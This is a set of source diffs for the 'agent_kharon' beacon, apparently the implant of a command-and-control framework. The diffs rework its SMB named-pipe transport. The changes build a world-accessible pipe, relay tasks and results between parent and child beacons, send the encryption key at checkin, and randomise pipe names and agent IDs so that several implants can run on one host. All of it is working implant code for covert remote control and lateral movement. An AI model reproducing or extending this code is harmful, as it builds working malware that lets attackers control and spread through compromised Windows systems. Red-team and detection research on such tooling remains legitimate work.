-        this->Pipe.Handle = nullptr;
-        return TRUE;
-    }
-
-    // TASK EXCHANGE — Dispatcher calls SmbSend TWICE per cycle:
-    //   Call 1 (Transmit): Pipe.Handle was nullptr → just created + connected → READ tasks
-    //   Call 2 (Jbs::Send): Pipe.Handle is still open from Call 1 → WRITE results
-    //
-    // Detect which call by checking if pipe was JUST created (Call 1) or already open (Call 2).
-    // We use a simple flag: if we just went through ConnectNamedPipe above, it's Call 1.
-    // If Handle was already set when SmbSend was called, it's Call 2.
-
-call2_write_results:
-    // Call 2 — write results on existing pipe connection, then close.
-    if ( ! pipeJustCreated ) {
-        Self->Ntdll.DbgPrint( "[SMB] Call 2: writing results on existing pipe\n" );
+    // --- CALL 2: Write results ---
+    if ( this->Pipe.TasksRead ) {
+        Self->Ntdll.DbgPrint( "[SMB] Call 2: writing results on persistent pipe\n" );
 
         if ( SendData && SendData->Ptr && SendData->Size > 0 ) {
             ULONG WriteLen = 0;
             ULONG DataLen  = (ULONG)SendData->Size;
 
-            // Single message write for PIPE_TYPE_MESSAGE
             ULONG TotalLen = sizeof(ULONG) + DataLen;
             PBYTE CombinedBuf = (PBYTE)KhAlloc( TotalLen );
             Mem::Copy( CombinedBuf, &DataLen, sizeof(ULONG) );
             Mem::Copy( CombinedBuf + sizeof(ULONG), SendData->Ptr, DataLen );
-            Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr );
+
+            if ( ! Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr ) ) {
+                Self->Ntdll.DbgPrint( "[SMB] Call 2: WriteFile failed: %d\n", KhGetError );
+                KhFree( CombinedBuf );
+                goto pipe_error;
+            }
             KhFree( CombinedBuf );
 
             Self->Ntdll.DbgPrint( "[SMB] Call 2: wrote %d bytes results\n", DataLen );
         }
 
-        Self->Ntdll.NtClose( this->Pipe.Handle );
-        this->Pipe.Handle = nullptr;
+        // Pipe stays open — next cycle Call 1 will read new tasks
+        this->Pipe.TasksRead = FALSE;
         return TRUE;
     }
 
-    // Call 1: pipe was just created and connected — READ tasks from parent
+    // --- CALL 1: Read tasks ---
     {
         Self->Ntdll.DbgPrint( "[SMB] Call 1: reading tasks from parent...\n" );
 
-        // Read entire message at once (PIPE_TYPE_MESSAGE: [4B len][payload] is one message)
+        // PeekNamedPipe loop — wait for parent to write tasks.
+        // No fixed retry limit: the child waits as long as needed (parent controls timing).
+        // PeekNamedPipe returns FALSE if pipe is broken → triggers error recovery.
         ULONG MsgLen = 0;
-        // PeekNamedPipe already told us how much data is available
-        if ( ! Self->Krnl32.PeekNamedPipe( this->Pipe.Handle, nullptr, 0, 0, &MsgLen, 0 ) || MsgLen < sizeof(ULONG) ) {
-            // Wait for parent to write
-            ULONG peekRetries = 0;
-            while ( peekRetries < 100 ) {
-                if ( Self->Krnl32.PeekNamedPipe( this->Pipe.Handle, nullptr, 0, 0, &MsgLen, 0 ) && MsgLen >= sizeof(ULONG) ) break;
-                Self->Krnl32.Sleep( 100 );
-                peekRetries++;
+        while ( TRUE ) {
+            if ( ! Self->Krnl32.PeekNamedPipe( this->Pipe.Handle, nullptr, 0, 0, &MsgLen, 0 ) ) {
+                Self->Ntdll.DbgPrint( "[SMB] Call 1: PeekNamedPipe failed (pipe broken): %d\n", KhGetError );
+                goto pipe_error;
             }
-            if ( MsgLen < sizeof(ULONG) ) {
-                Self->Ntdll.DbgPrint( "[SMB] Call 1: no data from parent\n" );
-                goto cleanup;
-            }
+            if ( MsgLen >= sizeof(ULONG) ) break;
+            Self->Krnl32.Sleep( 100 );
         }
 
         PBYTE MsgBuf = (PBYTE)KhAlloc( MsgLen );
-        if ( ! MsgBuf ) goto cleanup;
+        if ( ! MsgBuf ) goto pipe_error;
         ULONG ReadLen = 0;
         if ( ! Self->Krnl32.ReadFile( this->Pipe.Handle, MsgBuf, MsgLen, &ReadLen, nullptr ) ) {
             Self->Ntdll.DbgPrint( "[SMB] Call 1: ReadFile failed: %d\n", KhGetError );
             KhFree( MsgBuf );
-            goto cleanup;
+            goto pipe_error;
         }
 
         // Extract payload: skip 4-byte length prefix
@@ -361,16 +354,23 @@ call2_write_results:
             RecvData->Size = PrefixedLen;
         }
 
-        Self->Ntdll.DbgPrint( "[SMB] Call 1: read %d bytes tasks (prefixed to %d) — keeping pipe open\n", TaskLen, PrefixedLen );
+        Self->Ntdll.DbgPrint( "[SMB] Call 1: read %d bytes tasks (prefixed to %d)\n", TaskLen, PrefixedLen );
 
-        // Keep pipe open — Call 2 will write results
+        // Mark tasks as read — next SmbSend call will be Call 2 (write results)
+        this->Pipe.TasksRead = TRUE;
         return TRUE;
     }
 
-cleanup:
-    Self->Ntdll.NtClose( this->Pipe.Handle );
-    this->Pipe.Handle = nullptr;
-
+pipe_error:
+    // Error recovery: disconnect, close, and reset.
+    // Next Dispatcher cycle will recreate the pipe and wait for a new parent.
+    Self->Ntdll.DbgPrint( "[SMB] Pipe error — disconnecting and resetting\n" );
+    if ( this->Pipe.Handle ) {
+        Self->Krnl32.DisconnectNamedPipe( this->Pipe.Handle );
+        Self->Ntdll.NtClose( this->Pipe.Handle );
+    }
+    this->Pipe.Handle    = nullptr;
+    this->Pipe.TasksRead = FALSE;
     return FALSE;
 }
 #endif

--- a/agent_kharon/src_beacon/Source/Communication/Smb.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Smb.cc
@@ -7,46 +7,65 @@ auto Transport::SmbAdd(
 ) -> PVOID {
     SMB_PROFILE_DATA* SmbData = nullptr;
 
-    SmbData->Pkg = static_cast<PACKAGE*>( Package );
-    SmbData->Psr = static_cast<PARSER*>( Parser );
-
     BOOL   Success = FALSE;
     ULONG  BuffLen = 0;
     BYTE*  Buffer  = nullptr;
 
-    HANDLE Handle  = Self->Krnl32.CreateFileA( 
-        NamedPipe, GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr 
+    HANDLE Handle  = Self->Krnl32.CreateFileA(
+        NamedPipe, GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr
     );
     if ( Handle == INVALID_HANDLE_VALUE || ! Handle ) {
         KhDbg( "named pipe not found: %d", KhGetError ); return nullptr;
     }
 
-    if ( KhGetError == ERROR_PIPE_BUSY ) {
-        if ( ! Self->Krnl32.WaitNamedPipeA( NamedPipe, 6500 ) ) {
-            return nullptr;
-        }
-    }
-
-    while ( 1 ) {
+    // Wait for child to write data (child writes [4B length][payload] after ConnectNamedPipe)
+    ULONG retries = 0;
+    while ( retries < 50 ) {
         if ( Self->Krnl32.PeekNamedPipe( Handle, nullptr, 0, 0, &BuffLen, 0 ) ) {
-            if ( ! BuffLen ) {
-                KhDbg( "no data available from named pipe" );
-                return nullptr;
+            if ( BuffLen >= sizeof( ULONG ) ) {
+                Self->Ntdll.DbgPrint( "[SMB] SmbAdd: %d bytes available from pipe\n", BuffLen );
+                break;
             }
-
-            KhDbg( "%d available from named pipe", BuffLen );
-
-            Buffer = (BYTE*)KhAlloc( BuffLen );
-
-            if ( Self->Krnl32.ReadFile( Handle, Buffer, BuffLen, &BuffLen, nullptr ) ) {
-                KhDbg( "read pipe buffer with success: %d", BuffLen ); break;
-            } else {
-                KhDbg( "failed to read pipe buffer: %d", KhGetError ); Self->Ntdll.NtClose( Handle ); return nullptr;
-            }
-        } else {
-            KhDbg( "get pipe buffer length with failure: %d", KhGetError );
         }
+        Self->Krnl32.Sleep( 100 );
+        retries++;
     }
+
+    if ( BuffLen < sizeof( ULONG ) ) {
+        Self->Ntdll.DbgPrint( "[SMB] SmbAdd: no data from pipe after retries\n" );
+        Self->Ntdll.NtClose( Handle );
+        return nullptr;
+    }
+
+    // Read entire message at once (PIPE_TYPE_MESSAGE sends [4B len][payload] as single message)
+    Buffer = (BYTE*)KhAlloc( BuffLen );
+    ULONG BytesRead = 0;
+    if ( ! Self->Krnl32.ReadFile( Handle, Buffer, BuffLen, &BytesRead, nullptr ) ) {
+        Self->Ntdll.DbgPrint( "[SMB] SmbAdd: ReadFile failed: %d\n", KhGetError );
+        KhFree( Buffer );
+        Self->Ntdll.NtClose( Handle );
+        return nullptr;
+    }
+
+    Self->Ntdll.DbgPrint( "[SMB] SmbAdd: read %d bytes total message\n", BytesRead );
+
+    // Extract payload: skip first 4 bytes (length prefix)
+    if ( BytesRead <= sizeof(ULONG) ) {
+        Self->Ntdll.DbgPrint( "[SMB] SmbAdd: message too small\n" );
+        KhFree( Buffer );
+        Self->Ntdll.NtClose( Handle );
+        return nullptr;
+    }
+
+    ULONG PayloadLen = BytesRead - sizeof(ULONG);
+    PBYTE PayloadBuf = (PBYTE)KhAlloc( PayloadLen );
+    Mem::Copy( PayloadBuf, Buffer + sizeof(ULONG), PayloadLen );
+    KhFree( Buffer );
+    Buffer = PayloadBuf;
+    BuffLen = PayloadLen;
+
+    Self->Ntdll.DbgPrint( "[SMB] SmbAdd: read %d bytes payload (UUID starts: %c%c%c%c)\n",
+        BuffLen, Buffer[0], Buffer[1], Buffer[2], Buffer[3] );
 
     CHAR* TmpUUID = (CHAR*)KhAlloc( 36+1 );
 
@@ -56,12 +75,25 @@ auto Transport::SmbAdd(
 
     SmbData = (SMB_PROFILE_DATA*)KhAlloc( sizeof( SMB_PROFILE_DATA ) );
 
-    SmbData->Handle      = Handle;
-    SmbData->Pkg->Buffer = Buffer;
-    SmbData->Pkg->Length = BuffLen;
-    SmbData->SmbUUID     = TmpUUID;
-    SmbData->AgentUUID   = TmpUUID;
-    
+    SmbData->Handle    = Handle;
+    SmbData->SmbUUID   = TmpUUID;
+    SmbData->AgentUUID = TmpUUID;
+
+    // Store the pipe path for reconnection during task relay
+    ULONG PathLen = Str::LengthA( NamedPipe ) + 1;
+    SmbData->PipePath = (CHAR*)KhAlloc( PathLen );
+    Mem::Copy( SmbData->PipePath, NamedPipe, PathLen );
+
+    SmbData->Pkg = (PACKAGE*)KhAlloc( sizeof( PACKAGE ) );
+    SmbData->Psr = (PARSER*)KhAlloc( sizeof( PARSER ) );
+
+    SmbData->Pkg->Buffer  = Buffer;
+    SmbData->Pkg->Length  = BuffLen;
+    SmbData->Pkg->Size    = BuffLen;
+    SmbData->Pkg->Encrypt = FALSE;
+
+    SmbData->Next = nullptr;
+
     if ( ! this->Pipe.Node ) {
         this->Pipe.Node = SmbData;
     } else {
@@ -78,72 +110,266 @@ auto Transport::SmbAdd(
 }
 
 auto Transport::SmbRm(
-    _In_ PVOID SmbData
+    _In_ PVOID SmbDataPtr
 ) -> BOOL {
+    if ( ! SmbDataPtr || ! this->Pipe.Node ) return FALSE;
 
+    SMB_PROFILE_DATA* Target  = static_cast<SMB_PROFILE_DATA*>( SmbDataPtr );
+    SMB_PROFILE_DATA* Current = static_cast<SMB_PROFILE_DATA*>( this->Pipe.Node );
+    SMB_PROFILE_DATA* Prev    = nullptr;
+
+    while ( Current ) {
+        if ( Current == Target ) {
+            // Unlink from list
+            if ( Prev ) {
+                Prev->Next = Current->Next;
+            } else {
+                this->Pipe.Node = Current->Next;
+            }
+
+            // Close the pipe handle
+            if ( Current->Handle ) {
+                Self->Ntdll.NtClose( Current->Handle );
+            }
+
+            // Free allocated memory
+            if ( Current->SmbUUID ) {
+                KhFree( Current->SmbUUID );
+            }
+            if ( Current->Pkg ) {
+                if ( Current->Pkg->Buffer ) {
+                    KhFree( Current->Pkg->Buffer );
+                }
+                KhFree( Current->Pkg );
+            }
+            if ( Current->Psr ) {
+                KhFree( Current->Psr );
+            }
+            KhFree( Current );
+
+            return TRUE;
+        }
+
+        Prev    = Current;
+        Current = Current->Next;
+    }
+
+    return FALSE;
 }
 
 auto Transport::SmbList(
     VOID
 ) -> PVOID {
-
+    return this->Pipe.Node;
 }
 
 auto Transport::SmbGet(
     _In_ CHAR* SmbUUID
 ) -> PVOID {
-    
+    if ( ! SmbUUID || ! this->Pipe.Node ) return nullptr;
+
+    SMB_PROFILE_DATA* Current = static_cast<SMB_PROFILE_DATA*>( this->Pipe.Node );
+
+    while ( Current ) {
+        if ( Current->SmbUUID && Str::CompareA( Current->SmbUUID, SmbUUID ) == 0 ) {
+            return Current;
+        }
+        Current = Current->Next;
+    }
+
+    return nullptr;
 }
 
 #if PROFILE_C2 == PROFILE_SMB
 auto Transport::SmbSend(
-    _In_      PVOID   Data,
-    _In_      UINT64  Size,
-    _Out_opt_ PVOID  *RecvData,
-    _Out_opt_ UINT64 *RecvSize
+    _In_      MM_INFO* SendData,
+    _Out_opt_ MM_INFO* RecvData
 ) -> BOOL {
-    SECURITY_ATTRIBUTES* SecAttr = (SECURITY_ATTRIBUTES*)KhAlloc( sizeof( SECURITY_ATTRIBUTES ) );
-    SECURITY_DESCRIPTOR* SecDesc = (SECURITY_DESCRIPTOR*)KhAlloc( SECURITY_DESCRIPTOR_MIN_LENGTH );
+    BOOL Success = FALSE;
+    BOOL pipeJustCreated = FALSE;
 
-    SID_IDENTIFIER_AUTHORITY SidAuth  = SECURITY_WORLD_SID_AUTHORITY;
-    SID_IDENTIFIER_AUTHORITY SidLabel = SECURITY_MANDATORY_LABEL_AUTHORITY;
-    EXPLICIT_ACCESSA         Access   = { 0 };
+    Self->Ntdll.DbgPrint( "[SMB] SmbSend called, Pipe.Name=%s, Pipe.Handle=%p\n",
+        this->Pipe.Name ? this->Pipe.Name : "(null)", this->Pipe.Handle );
 
-    SID* Sidl = nullptr;
-    SID* Sid  = nullptr;
+    // If the pipe handle doesn't exist yet, create it and wait for parent connection
+    if ( ! this->Pipe.Handle ) {
+        pipeJustCreated = TRUE;
+        SECURITY_ATTRIBUTES* SecAttr = (SECURITY_ATTRIBUTES*)KhAlloc( sizeof( SECURITY_ATTRIBUTES ) );
+        SECURITY_DESCRIPTOR* SecDesc = (SECURITY_DESCRIPTOR*)KhAlloc( SECURITY_DESCRIPTOR_MIN_LENGTH );
 
-    ULONG sadasda = 0;
-    ACL* SAcl = nullptr;  
-    ACL* DAcl = nullptr;
+        SID_IDENTIFIER_AUTHORITY SidAuth  = SECURITY_WORLD_SID_AUTHORITY;
+        EXPLICIT_ACCESSA         Access   = { 0 };
 
-    Self->Advapi32.AllocateAndInitializeSid( &SidAuth, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, (PSID*)&Sid );
+        SID* Sid  = nullptr;
+        ACL* DAcl = nullptr;
 
-    Access.Trustee.TrusteeType  = TRUSTEE_IS_WELL_KNOWN_GROUP;
-    Access.Trustee.TrusteeForm  = TRUSTEE_IS_SID;
-    Access.Trustee.ptstrName    = (CHAR*)Sid;
-    Access.grfAccessMode        = SET_ACCESS;
-    Access.grfInheritance       = NO_INHERITANCE;
-    Access.grfAccessPermissions = SPECIFIC_RIGHTS_ALL | STANDARD_RIGHTS_ALL;
+        Self->Advapi32.AllocateAndInitializeSid( &SidAuth, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, (PSID*)&Sid );
 
-    Self->Advapi32.SetEntriesInAclA( 1, &Access, nullptr, &DAcl );
+        Access.Trustee.TrusteeType  = TRUSTEE_IS_WELL_KNOWN_GROUP;
+        Access.Trustee.TrusteeForm  = TRUSTEE_IS_SID;
+        Access.Trustee.ptstrName    = (CHAR*)Sid;
+        Access.grfAccessMode        = SET_ACCESS;
+        Access.grfInheritance       = NO_INHERITANCE;
+        Access.grfAccessPermissions = SPECIFIC_RIGHTS_ALL | STANDARD_RIGHTS_ALL;
 
-    Self->Advapi32.AllocateAndInitializeSid( &SidLabel, 1, SECURITY_MANDATORY_LOW_RID, 0, 0, 0, 0, 0, 0, 0, (PSID*)&Sidl );
+        Self->Advapi32.SetEntriesInAclA( 1, &Access, nullptr, &DAcl );
 
-    Self->Advapi32.InitializeSecurityDescriptor( SecDesc, SECURITY_DESCRIPTOR_REVISION );
+        Self->Advapi32.InitializeSecurityDescriptor( SecDesc, SECURITY_DESCRIPTOR_REVISION );
 
-    Self->Advapi32.SetSecurityDescriptorDacl( SecDesc, TRUE, DAcl, FALSE );
+        Self->Advapi32.SetSecurityDescriptorDacl( SecDesc, TRUE, DAcl, FALSE );
 
-    Self->Advapi32.SetSecurityDescriptorSacl( SecDesc, TRUE, SAcl, FALSE );
+        SecAttr->bInheritHandle       = FALSE;
+        SecAttr->nLength              = sizeof( SECURITY_ATTRIBUTES );
+        SecAttr->lpSecurityDescriptor = SecDesc;
 
-    SecAttr->bInheritHandle       = FALSE;
-    SecAttr->nLength              = sizeof( SECURITY_ATTRIBUTES );
-    SecAttr->lpSecurityDescriptor = SecDesc;
+        this->Pipe.Handle = Self->Krnl32.CreateNamedPipeA(
+            this->Pipe.Name, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
+            PIPE_UNLIMITED_INSTANCES, PIPE_BUFFER_LENGTH, PIPE_BUFFER_LENGTH, 0, SecAttr
+        );
 
-    this->Pipe.Handle = Self->Krnl32.CreateNamedPipeA( 
-        this->Pipe.Name, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT, 
-        PIPE_UNLIMITED_INSTANCES, PIPE_BUFFER_LENGTH, PIPE_BUFFER_LENGTH, 0, SecAttr
-    );
+        if ( this->Pipe.Handle == INVALID_HANDLE_VALUE || ! this->Pipe.Handle ) {
+            Self->Ntdll.DbgPrint( "[SMB] CreateNamedPipeA FAILED: error=%d, name=%s\n", KhGetError,
+                this->Pipe.Name ? this->Pipe.Name : "(null)" );
+            this->Pipe.Handle = nullptr;
+            return FALSE;
+        }
 
-    Self->Krnl32.ConnectNamedPipe( this->Pipe.Handle, nullptr );
+        Self->Ntdll.DbgPrint( "[SMB] Pipe created OK: %s, handle=%p\n", this->Pipe.Name, this->Pipe.Handle );
+    }
+
+    // Call 2: pipe is already connected from Call 1 — go directly to writing results
+    if ( ! pipeJustCreated && Self->Session.Connected ) {
+        Self->Ntdll.DbgPrint( "[SMB] Call 2: pipe still open, writing results directly\n" );
+        goto call2_write_results;
+    }
+
+    Self->Ntdll.DbgPrint( "[SMB] Waiting for parent to connect...\n" );
+
+    // Wait for parent beacon to connect
+    if ( ! Self->Krnl32.ConnectNamedPipe( this->Pipe.Handle, nullptr ) ) {
+        if ( KhGetError != ERROR_PIPE_CONNECTED ) {
+            Self->Ntdll.DbgPrint( "[SMB] ConnectNamedPipe failed: %d\n", KhGetError );
+            return FALSE;
+        }
+    }
+
+    Self->Ntdll.DbgPrint( "[SMB] Parent connected!\n" );
+
+    // FIRST CHECKIN: write checkin data, close pipe
+    if ( ! Self->Session.Connected ) {
+        if ( SendData && SendData->Ptr && SendData->Size > 0 ) {
+            ULONG WriteLen = 0;
+            ULONG DataLen  = (ULONG)SendData->Size;
+
+            // Single message write for PIPE_TYPE_MESSAGE
+            ULONG TotalLen = sizeof(ULONG) + DataLen;
+            PBYTE CombinedBuf = (PBYTE)KhAlloc( TotalLen );
+            Mem::Copy( CombinedBuf, &DataLen, sizeof(ULONG) );
+            Mem::Copy( CombinedBuf + sizeof(ULONG), SendData->Ptr, DataLen );
+            Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr );
+            KhFree( CombinedBuf );
+
+            Self->Ntdll.DbgPrint( "[SMB] Wrote %d bytes checkin to pipe\n", DataLen );
+        }
+
+        Self->Ntdll.DbgPrint( "[SMB] First checkin — not waiting for response\n" );
+        Self->Ntdll.NtClose( this->Pipe.Handle );
+        this->Pipe.Handle = nullptr;
+        return TRUE;
+    }
+
+    // TASK EXCHANGE — Dispatcher calls SmbSend TWICE per cycle:
+    //   Call 1 (Transmit): Pipe.Handle was nullptr → just created + connected → READ tasks
+    //   Call 2 (Jbs::Send): Pipe.Handle is still open from Call 1 → WRITE results
+    //
+    // Detect which call by checking if pipe was JUST created (Call 1) or already open (Call 2).
+    // We use a simple flag: if we just went through ConnectNamedPipe above, it's Call 1.
+    // If Handle was already set when SmbSend was called, it's Call 2.
+
+call2_write_results:
+    // Call 2 — write results on existing pipe connection, then close.
+    if ( ! pipeJustCreated ) {
+        Self->Ntdll.DbgPrint( "[SMB] Call 2: writing results on existing pipe\n" );
+
+        if ( SendData && SendData->Ptr && SendData->Size > 0 ) {
+            ULONG WriteLen = 0;
+            ULONG DataLen  = (ULONG)SendData->Size;
+
+            // Single message write for PIPE_TYPE_MESSAGE
+            ULONG TotalLen = sizeof(ULONG) + DataLen;
+            PBYTE CombinedBuf = (PBYTE)KhAlloc( TotalLen );
+            Mem::Copy( CombinedBuf, &DataLen, sizeof(ULONG) );
+            Mem::Copy( CombinedBuf + sizeof(ULONG), SendData->Ptr, DataLen );
+            Self->Krnl32.WriteFile( this->Pipe.Handle, CombinedBuf, TotalLen, &WriteLen, nullptr );
+            KhFree( CombinedBuf );
+
+            Self->Ntdll.DbgPrint( "[SMB] Call 2: wrote %d bytes results\n", DataLen );
+        }
+
+        Self->Ntdll.NtClose( this->Pipe.Handle );
+        this->Pipe.Handle = nullptr;
+        return TRUE;
+    }
+
+    // Call 1: pipe was just created and connected — READ tasks from parent
+    {
+        Self->Ntdll.DbgPrint( "[SMB] Call 1: reading tasks from parent...\n" );
+
+        // Read entire message at once (PIPE_TYPE_MESSAGE: [4B len][payload] is one message)
+        ULONG MsgLen = 0;
+        // PeekNamedPipe already told us how much data is available
+        if ( ! Self->Krnl32.PeekNamedPipe( this->Pipe.Handle, nullptr, 0, 0, &MsgLen, 0 ) || MsgLen < sizeof(ULONG) ) {
+            // Wait for parent to write
+            ULONG peekRetries = 0;
+            while ( peekRetries < 100 ) {
+                if ( Self->Krnl32.PeekNamedPipe( this->Pipe.Handle, nullptr, 0, 0, &MsgLen, 0 ) && MsgLen >= sizeof(ULONG) ) break;
+                Self->Krnl32.Sleep( 100 );
+                peekRetries++;
+            }
+            if ( MsgLen < sizeof(ULONG) ) {
+                Self->Ntdll.DbgPrint( "[SMB] Call 1: no data from parent\n" );
+                goto cleanup;
+            }
+        }
+
+        PBYTE MsgBuf = (PBYTE)KhAlloc( MsgLen );
+        if ( ! MsgBuf ) goto cleanup;
+        ULONG ReadLen = 0;
+        if ( ! Self->Krnl32.ReadFile( this->Pipe.Handle, MsgBuf, MsgLen, &ReadLen, nullptr ) ) {
+            Self->Ntdll.DbgPrint( "[SMB] Call 1: ReadFile failed: %d\n", KhGetError );
+            KhFree( MsgBuf );
+            goto cleanup;
+        }
+
+        // Extract payload: skip 4-byte length prefix
+        ULONG TaskLen = ReadLen - sizeof(ULONG);
+        PBYTE TaskBuf = (PBYTE)KhAlloc( TaskLen );
+        Mem::Copy( TaskBuf, MsgBuf + sizeof(ULONG), TaskLen );
+        KhFree( MsgBuf );
+
+        // Prepend 36-byte dummy UUID prefix so Parser::NewTask's Pad(36) works correctly.
+        // NewTask always skips first 36 bytes (UUID from HTTP response). SMB data has no UUID.
+        ULONG PrefixedLen = 36 + TaskLen;
+        PBYTE PrefixedBuf = (PBYTE)KhAlloc( PrefixedLen );
+        Mem::Zero( U_PTR(PrefixedBuf), 36 );
+        Mem::Copy( PrefixedBuf + 36, TaskBuf, TaskLen );
+        KhFree( TaskBuf );
+
+        if ( RecvData ) {
+            RecvData->Ptr  = PrefixedBuf;
+            RecvData->Size = PrefixedLen;
+        }
+
+        Self->Ntdll.DbgPrint( "[SMB] Call 1: read %d bytes tasks (prefixed to %d) — keeping pipe open\n", TaskLen, PrefixedLen );
+
+        // Keep pipe open — Call 2 will write results
+        return TRUE;
+    }
+
+cleanup:
+    Self->Ntdll.NtClose( this->Pipe.Handle );
+    this->Pipe.Handle = nullptr;
+
+    return FALSE;
 }
 #endif

--- a/agent_kharon/src_beacon/Source/Communication/Transport.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Transport.cc
@@ -111,6 +111,9 @@ auto DECLFN Transport::Checkin(
     // encryption key
     Self->Pkg->Bytes( CheckinPkg, Self->Crp->LokKey, sizeof( Self->Crp->LokKey ) );
 
+    // SMB pipe name (empty string for HTTP beacons)
+    Self->Pkg->Str( CheckinPkg, Self->Tsp->Pipe.Name ? Self->Tsp->Pipe.Name : (PCHAR)"" );
+
     //
     // send the packet
     //

--- a/agent_kharon/src_beacon/Source/Communication/Transport.cc
+++ b/agent_kharon/src_beacon/Source/Communication/Transport.cc
@@ -121,7 +121,17 @@ auto DECLFN Transport::Checkin(
     KhDbg( "transmited return %p [%d bytes]", Data, Length );
 
     //
-    // parse response
+    // If no response data (SMB checkin — parent reads data, no response on pipe)
+    // just mark as connected and return.
+    //
+    if ( ! Data || ! Length ) {
+        Self->Session.Connected = TRUE;
+        Self->Ntdll.DbgPrint( "[SMB] Checkin sent, no response expected — marked as connected\n" );
+        return TRUE;
+    }
+
+    //
+    // HTTP checkin: parse response with new agent ID
     //
     Self->Psr->New( CheckinPsr, Data, Length );
     if ( ! CheckinPsr->Original ) return FALSE;
@@ -159,11 +169,13 @@ auto Transport::Send(
     _Out_opt_ MM_INFO* RecvData
 ) -> BOOL {
 #if PROFILE_C2 == PROFILE_HTTP
+    Self->Ntdll.DbgPrint( "[TRANSPORT] Send via HTTP\n" );
     return Self->Tsp->HttpSend(
         SendData, RecvData
     );
 #endif
 #if PROFILE_C2 == PROFILE_SMB
+    Self->Ntdll.DbgPrint( "[TRANSPORT] Send via SMB\n" );
     return Self->Tsp->SmbSend(
         SendData, RecvData
     );

--- a/agent_kharon/src_beacon/Source/Config.cc
+++ b/agent_kharon/src_beacon/Source/Config.cc
@@ -70,13 +70,27 @@ auto DECLFN GetConfig( KHARON_CONFIG* Cfg ) -> VOID {
     }
 
     // SMB pipe name as stack byte array (NOT static — .data section is stripped from PIC)
+    // Append 4-char random suffix so each beacon instance gets a unique pipe name.
+    // Without this, multiple beacons on the same host create pipes with the same name,
+    // causing Exchange to connect to the wrong beacon (Windows picks any available instance).
     BYTE smb_pipe_bytes[] = SMB_PIPE_NAME;
-    // Copy to heap so it persists after GetConfig returns
-    ULONG smb_pipe_len = sizeof(smb_pipe_bytes);
-    Self->Tsp->Pipe.Name = (PCHAR)KhAlloc( smb_pipe_len );
-    Mem::Copy( Self->Tsp->Pipe.Name, smb_pipe_bytes, smb_pipe_len );
+    ULONG base_len = sizeof(smb_pipe_bytes) - 1; // exclude null
+    ULONG suffix_len = 5; // "_" + 4 hex chars
+    ULONG total_len = base_len + suffix_len + 1; // + null
+    Self->Tsp->Pipe.Name = (PCHAR)KhAlloc( total_len );
+    Mem::Copy( Self->Tsp->Pipe.Name, smb_pipe_bytes, base_len );
+    Self->Tsp->Pipe.Name[base_len] = '_';
+    {
+        ULONG pseed = Self->Krnl32.GetTickCount();
+        PCHAR hx = (PCHAR)"0123456789abcdef";
+        for ( ULONG si = 0; si < 4; si++ ) {
+            pseed = Self->Ntdll.RtlRandomEx( &pseed );
+            Self->Tsp->Pipe.Name[base_len + 1 + si] = hx[pseed % 16];
+        }
+    }
+    Self->Tsp->Pipe.Name[total_len - 1] = 0;
     Self->Ntdll.DbgPrint( "[SMB-CFG] Pipe name set: %s (len=%d, bytes[0]=0x%02x)\n",
-        Self->Tsp->Pipe.Name, smb_pipe_len, smb_pipe_bytes[0] );
+        Self->Tsp->Pipe.Name, total_len - 1, smb_pipe_bytes[0] );
 #else
     Self->Ntdll.DbgPrint( "[SMB-CFG] PROFILE_C2 is NOT SMB (value=0x%x)\n", PROFILE_C2 );
 #endif

--- a/agent_kharon/src_beacon/Source/Config.cc
+++ b/agent_kharon/src_beacon/Source/Config.cc
@@ -49,6 +49,26 @@ auto DECLFN GetConfig( KHARON_CONFIG* Cfg ) -> VOID {
     Cfg->KillDate.Enabled    = KH_KILLDATE_ENABLED;
 
 #if PROFILE_C2 == PROFILE_SMB
+    // Generate a unique AgentId at runtime so multiple instances of the same
+    // binary get distinct identities. Without this, running smb.exe twice
+    // produces two beacons with the same UUID, and the server rejects the second.
+    {
+        ULONG seed = Self->Krnl32.GetTickCount();
+        PCHAR hexChars = (PCHAR)"0123456789abcdef";
+        PCHAR newUUID = (PCHAR)KhAlloc( 37 ); // 36 chars + null
+        ULONG pos = 0;
+        for ( ULONG i = 0; i < 36; i++ ) {
+            if ( i == 8 || i == 13 || i == 18 || i == 23 ) {
+                newUUID[pos++] = '-';
+            } else {
+                seed = Self->Ntdll.RtlRandomEx( &seed );
+                newUUID[pos++] = hexChars[seed % 16];
+            }
+        }
+        newUUID[36] = 0;
+        Cfg->AgentId = newUUID;
+    }
+
     // SMB pipe name as stack byte array (NOT static — .data section is stripped from PIC)
     BYTE smb_pipe_bytes[] = SMB_PIPE_NAME;
     // Copy to heap so it persists after GetConfig returns

--- a/agent_kharon/src_beacon/Source/Config.cc
+++ b/agent_kharon/src_beacon/Source/Config.cc
@@ -48,6 +48,20 @@ auto DECLFN GetConfig( KHARON_CONFIG* Cfg ) -> VOID {
     Cfg->KillDate.ExitProc   = TRUE;
     Cfg->KillDate.Enabled    = KH_KILLDATE_ENABLED;
 
+#if PROFILE_C2 == PROFILE_SMB
+    // SMB pipe name as stack byte array (NOT static — .data section is stripped from PIC)
+    BYTE smb_pipe_bytes[] = SMB_PIPE_NAME;
+    // Copy to heap so it persists after GetConfig returns
+    ULONG smb_pipe_len = sizeof(smb_pipe_bytes);
+    Self->Tsp->Pipe.Name = (PCHAR)KhAlloc( smb_pipe_len );
+    Mem::Copy( Self->Tsp->Pipe.Name, smb_pipe_bytes, smb_pipe_len );
+    Self->Ntdll.DbgPrint( "[SMB-CFG] Pipe name set: %s (len=%d, bytes[0]=0x%02x)\n",
+        Self->Tsp->Pipe.Name, smb_pipe_len, smb_pipe_bytes[0] );
+#else
